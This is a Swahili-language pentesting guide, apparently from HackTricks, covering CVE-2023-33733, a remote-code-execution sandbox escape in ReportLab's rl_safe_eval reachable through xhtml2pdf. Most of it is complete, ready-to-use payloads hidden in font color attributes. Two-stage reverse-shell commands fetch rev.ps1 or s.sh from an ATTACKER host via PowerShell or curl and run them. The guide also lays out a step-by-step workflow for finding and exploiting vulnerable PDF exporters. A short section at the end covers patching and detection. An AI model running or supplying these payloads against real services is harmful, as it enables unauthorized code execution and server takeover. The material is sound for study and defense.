# ReportLab/xhtml2pdf [[[...]]] utendaji wa tathmini ya expression RCE (CVE-2023-33733)

{{#include ../../../banners/hacktricks-training.md}}

Ukurasa huu unaelezea uhamisho wa sandbox na primitive ya RCE katika rl_safe_eval ya ReportLab inayotumika na xhtml2pdf na pipeline nyingine za kuunda PDF wanapofanya render HTML inayodhibitiwa na mtumiaji kuwa PDF.

CVE-2023-33733 inaathiri ReportLab kwa toleo hadi na pamoja na 3.6.12. Katika muktadha fulani wa attribute (kwa mfano color), values zilizowekwa ndani ya triple brackets [[[ ... ]]] zinatathminiwa server-side na rl_safe_eval. Kwa kutengeneza payload inayopita kutoka kwa builtin iliyoruhusiwa (pow) hadi globals za function ya Python, mshambuliaji anaweza kufikia module ya os na kutekeleza amri.

Mambo muhimu
- Vichocheo: weka [[[ ... ]]] ndani ya attributes zinazothaminiwa kama <font color="..."> ndani ya markup inayochambuliwa na ReportLab/xhtml2pdf.
- Sandbox: rl_safe_eval inabadilisha builtins hatari lakini functions zilizothaminiwa bado zinaonyesha __globals__.
- Bypass: tengeneza darasa la muda mfupi Word kupita ukaguzi wa majina wa rl_safe_eval na kufikia string "__globals__" huku ukiepuka uchujaji wa dunder uliokatazwa.
- RCE: getattr(pow, Word("__globals__"))["os"].system("<cmd>")
- Utulivu: Rudisha value halali kwa attribute baada ya utekelezaji (kwa color, tumia na 'red').

Wakati wa kujaribu
- Programu zinazotoa HTML-to-PDF export (profiles, invoices, reports) na zinaonyesha xhtml2pdf/ReportLab katika metadata ya PDF au maoni ya HTTP response.
- exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
- HTTP response kwa PDF mara nyingi huanza na comment ya generator ya ReportLab

Jinsi mbinu ya kuipita sandbox inavyofanya kazi
- rl_safe_eval inaondoa au kubadilisha builtins nyingi (getattr, type, pow, ...) na inatumia uchujaji wa majina kuzuia attributes zinazoanza na __ au zilizo kwenye denylist.
- Hata hivyo, functions salama huishi katika kamusi ya globals inayopatikana kama func.__globals__.
- Tumia type(type(1)) kupata function ya builtin type halisi (kupitia wrapper ya ReportLab), kisha tambua darasa Word lenye urithi kutoka str na tabia iliyobadilishwa ya kulinganisha ili:
  - .startswith('__') → daima False (kupita ukaguzi wa startswith('__'))
  - .__eq__ inarudisha False tu kwa ulinganishaji wa kwanza (kupita ukaguzi wa denylist) na True baadaye (hivyo getattr inafanya kazi)
  - .__hash__ ni sawa na hash(str(self))
- Kwa hili, getattr(pow, Word('__globals__')) inarudisha kamusi ya globals ya function iliyofungwa pow, ambayo inajumuisha module ya os iliyolazimishwa. Kisha: ['os'].system('<cmd>').

Mfano wa u exploit mdogo (mfano wa attribute)
Weka payload ndani ya attribute inayothaminiwa na hakikisha inarudisha value halali ya attribute kwa kutumia boolean na 'red'.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('ping 10.10.10.10') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>

- Fomu ya list-comprehension inaruhusu expression moja inayokubalika kwa rl_safe_eval.
- Mwisho na 'red' unarudisha rangi ya CSS halali kiasi kwamba rendering haisivunjike.
- Badilisha amri kulingana na mahitaji; tumia ping kuthibitisha utekelezaji kwa tcpdump.

Mfumo wa uendeshaji
1) Tambua PDF generator
- PDF Producer inaonyesha xhtml2pdf; HTTP response ina comment ya ReportLab.
2) Pata input inayoreflektwa ndani ya PDF (kwa mfano, profile bio/description) na chochea export.
3) Thibitisha utekelezaji kwa ICMP yenye kelele ndogo
- Endesha: sudo tcpdump -ni <iface> icmp
- Payload: ... system('ping <your_ip>') ...
- Windows mara nyingi hutuma echo requests nne tu kwa default.
4) Anzisha shell
- Kwa Windows, mbinu ya hatua mbili ya kuaminika inazuia matatizo ya quoting/encoding:
- Stage 1 (download):

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -c iwr http://ATTACKER/rev.ps1 -o rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

- Stage 2 (execute):

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell ./rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

- Kwa targets za Linux, njia ya hatua mbili sawa inapatikana kwa curl/wget:
- system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')

Vidokezo na ushauri
- Muktadha wa attribute: color ni attribute inayojulikana inayothaminiwa; attributes nyingine katika ReportLab markup zinaweza pia kuthamini expressions. Ikiwa sehemu moja imesafishwa, jaribu sehemu nyingine zinazochorwa ndani ya mtiririko wa PDF (fields tofauti, table styles, n.k.).
- Quoting: Weka amri fupi. Upakuaji wa hatua mbili unapunguza kwa kiasi kikubwa matatizo ya quoting na escaping.
- Uaminifu: Ikiwa exports zimekaa au zimepangwa, badilisha kidogo payload (kwa mfano, path au query ya nasibu) ili kuepuka caches.

Uzuiaji na utambuzi
- Sasisha ReportLab hadi 3.6.13 au baadaye (CVE-2023-33733 imerekebishwa). Fuata advisories za usalama pia katika packages za distro.
- Usiruhusu HTML/markup inayodhibitiwa na watumiaji kuingizwa moja kwa moja ndani ya xhtml2pdf/ReportLab bila kusafishwa kwa ukali. Ondoa/kataa tathmini ya [[[...]]] na tags za vendor wakati input haijatumika.
- Fikiria kuzima au kufunika matumizi ya rl_safe_eval kabisa kwa inputs zisizoaminika.
- Angalia kwa miunganisho ya kutarajia kutoka nje wakati wa uundaji wa PDF (kwa mfano, ICMP/HTTP kutoka servers za app wakati wa ku-export hati).

Marejeo
- PoC na uchambuzi wa kiufundi: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
- 0xdf University HTB write-up (uukaji wa dunia halisi, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html)
- Kuingia kwa NVD (mifano iliyoharibika): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733)
- nyaraka za xhtml2pdf (dhana za markup/ukurasa): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html)

{{#include ../../../banners/hacktricks-training.md}}